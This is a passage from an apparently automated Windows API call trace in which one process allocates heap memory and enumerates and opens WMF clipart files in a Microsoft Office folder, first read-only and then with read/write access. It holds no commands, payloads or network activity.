| out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.510] AreFileApisANSI () returned 1 [0103.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0103.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 69 [0103.510] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf38)) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0103.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.511] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00445_.WMF", cAlternateFileName="")) returned 1 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0103.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0103.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.511] AreFileApisANSI () returned 1 [0103.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0103.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.512] AreFileApisANSI () returned 1 [0103.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 69 [0103.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.513] GetFileType (hFile=0x33c) returned 0x1 [0103.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.513] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.513] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.513] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.513] CloseHandle (hObject=0x33c) returned 1 [0103.513] AreFileApisANSI () returned 1 [0103.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0103.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 69 [0103.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.514] GetFileType (hFile=0x33c) returned 0x1 [0103.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0103.514] CloseHandle (hObject=0x33c) returned 1 [0103.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.514] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed4)) returned 1 [0103.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0103.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.514] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00453_.WMF", cAlternateFileName="")) returned 1 [0103.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.515] GetFileType (hFile=0x33c) returned 0x1 [0103.515] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.516] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.516] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.516] CloseHandle (hObject=0x33c) returned 1 [0103.516] AreFileApisANSI () returned 1 [0103.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0103.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 69 [0103.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.516] GetFileType (hFile=0x33c) returned 0x1 [0103.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0103.517] CloseHandle (hObject=0x33c) returned 1 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.518] AreFileApisANSI () returned 1 [0103.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 69 [0103.518] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x984)) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0103.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.518] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01080_.WMF", cAlternateFileName="")) returned 1 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 